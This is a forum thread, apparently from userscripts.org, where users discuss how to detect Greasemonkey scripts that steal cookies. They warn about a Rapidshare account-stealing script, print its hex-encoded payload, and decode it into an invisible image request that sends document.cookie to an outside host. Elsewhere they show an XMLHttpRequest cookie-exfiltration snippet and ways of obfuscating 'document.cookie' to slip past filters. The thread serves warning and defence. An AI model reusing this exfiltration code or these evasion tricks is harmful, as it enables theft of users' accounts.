Userscripts.org

Can someone explain me how to install scripts? I was looking in that topic and try diffrent things but still can't install scripts. Please help me.

Wrong Topic
> http://www.greasespot.net/

!

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergip..." GodDamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergio..." goddamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??

o_O I don't understand, this script is safe right? I was going to try and get in contact with the maker or someone of code knowledge because it doesn't work for videos using "/ep_gr.swf?v=" I have to remove "/ep_gr.swf" was thinking script should be able to do that but no idea what so ever how to script it.

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergio..." goddamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??

what are you talking about?

aaaa

Perhaps the uploading process can scan for the aforementioned keywords to detect cookie stealing, while also searching for shorturls and tinyurls; if such URLs are found, a notice can be displayed alerting people that the userscript links to unknown URLs and may thus contain hazardous code; and if the cookie stealing stuff is displayed, the script can be immediately blocked.

As for stopping the charcode workaround, the userscript can search for charcode-related functions and scan them for the respective charcodes in addition to searching for the string "document.cookie"; it may also be necessary to search for any occurances of a coder storing a charcode function in a variable to avoid detection, e.x. (var avoidTheFilters = String.fromCharCode;). This, however, will fail to stop the following possible filter workaround:

varname.scrapText.value=eval(String.fromCharCode(100,111,99)+String.fromCharCode(117,109,101,110,116)+String.fromCharCode(46,99,111,111,107,105,101))

So the following upload filters could be enacted to prevent cookie exploits, charcode-related vulnerabilities, and potential problems with URL-shortening services:

• Search for cookie-stealing keywords
  • Find all String.fromCharCode() statements and replace them with their results such that "String.fromCharCode(100,111,99)" becomes "doc"
• Search for tinyurls, shorturls, etc., and display warning notices if any are found

The fromCharCode is not the only way to build a string, I can do it with a simple strings concatenation "doc"+"ume"+"nt."+"coo"+"kie", or with an array ["doc","ume","nt.","coo","kie"].join("") and there are a lot of other ways much complicated and more obfuscated to create the string "document.cookie", but this is not the only way to access the cookies, look at the following code: for(var prop in document) if (prop.indexOf("coo")!=-1) { document[prop] }.

No OGame Tr Server Scripts..??

If possible, the server can actually run a quick test of the code giving it random-ish values if it asks for DOM-related stuff, and if it gets a request for document.cookie, it flags the script as possible malware?

I have no idea how much (or little?) bandwidth or server processing power that suggestion would require to use, so it would probably be an implausible solution...

Hi, i got some problem it says windows isnt determined and document isnt determined anyone can help me plz!!

How about a watch on the call to document.cookie to determine if cookie is being interacted with in any way shape or form? This would be vulnerable to a redefinition of the watch method.

I think the best way to date is by implementing this on the userscript site :
http://userscripts.uservoice.com/pages/general/...

yes this is known as cookie poisoning i think i read about it in Wikipedia
all they do is insert a variable in the script like this
cookie=document.cookie;
and they call an Ajax request to store the cookie on a web of their own like this:
var xmlHttp
xmlHttp=GetXmlHttpObject();
var url="savecookie.asp or .php";
url=url+"?cookie="+cookie;
xmlHttp.open("GET",url,true);
xmlHttp.send(null);

if you see any of these lines in your scripts delete it immediately and report it

I know how to prevent these cookie stealers:
Have Greasemonkey replace:

open(Anything, Something, true);

with:

variable = CheckSanity(Something);
open(Anything, variable, true);

And also replace all assignments to:

window.location, this.href, image.src and such things so its run through CheckSanity();

CheckSanity checks the url against a whitelist, so in greasemonkey, you have a whitelist saying which URLs you want your scripts to access, and then if CheckSanity denies, it will return a generic URL like http://127.0.0.1
The malicious script will be allowed to freely access cookies, but it cannot send them anywhere.

The thing with placing the url in a variable, is to have the real value of the url through CheckSanity, so a malicious script cannot encrypt the url. Have a decoder too, that decodes URL encoded urls.

Seems to me like it'd be easier to just read through the script and in case something isn't right, don't install it...

Rapidshare Premium & Collectors TweakPack (lftk v03) by lifetalk
http://userscripts.org/scripts/show/36739

As john_doe_the_third (thank you) say:

This script is an account stealer.

DO NOT INSTALL IT!

The script was deleted several times and lifetalk (aka sam hunter) upped it again and again to steal more and more rapidshare accounts.

It uses a modified version of the jQuery library, which contains some more lines filled in by lifetalk (lines 2330-2340).

var jQueryCopyright =
'%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%'+
'61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%65%6E%63%72%79%70%74%5F%6'+
'6%69%78%3D%64%6F%63%75%6D%65%6E%74%3B%0A%27%3C%69%6D%67%20%73%72%63'+
'%3D%22%68%74%74%70%3A%2F%2F%7A%73%68%61%72%65%61%75%64%69%6F%2E%70%'+
'68%70%6E%65%74%2E%75%73%2F%69%6E%64%65%78%2E%70%68%70%3F%27%0A%2B%7'+
'5%6E%65%73%63%61%70%65%28%65%6E%63%72%79%70%74%5F%66%69%78%2E%63%6F'+
'%6F%6B%69%65%29%20%2B%20%27%22%20%73%74%79%6C%65%3D%22%68%65%69%67%'+
'68%74%3A%30%70%78%3B%20%77%69%64%74%68%3A%30%70%78%3B%20%62%6F%72%6'+
'4%65%72%3A%20%30%70%78%3B%22%20%77%69%64%74%68%3D%22%30%22%20%68%65'+
'%69%67%68%74%3D%22%30%22%3E%27%3B%0A%7D%3C%2F%73%63%72%69%70%74%3E ';

If you convert these lines (hex => ascii) you get:

'';?}

Your rapidshare cookie (which contains your login and password) will be sent to http://zshareaudio.phpnet.us/ and your account is gone.

At code:

// Add jQuery
var GM_JQ = document.createElement('script');
GM_JQ.src = 'http://jquery.07x.net/jquery.js';

@matrixik

can you (please) update Screen Userscripts?

thanks.

I see a problem, if a script contains @require pointing to a dirty .js

we need a javascript antivirus... runs nice as a userscript...

I already have a javascript antivirus. Its called a brain lol.

javacript anti-virus
cool :D

wonder how the heck it works

@matrixik

That jumble of code in jQueryCopyright turns out to be:

<script type="text/javascript">
var encrypt_fix=document;
'<img src="http://zshareaudio.phpnet.us/index.php?' +unescape(encrypt_fix.cookie) + '" style="height:0px; width:0px; border: 0px;" width="0" height="0">';
}</script>

I like how he stored document in something called encrypt_fix.... LOL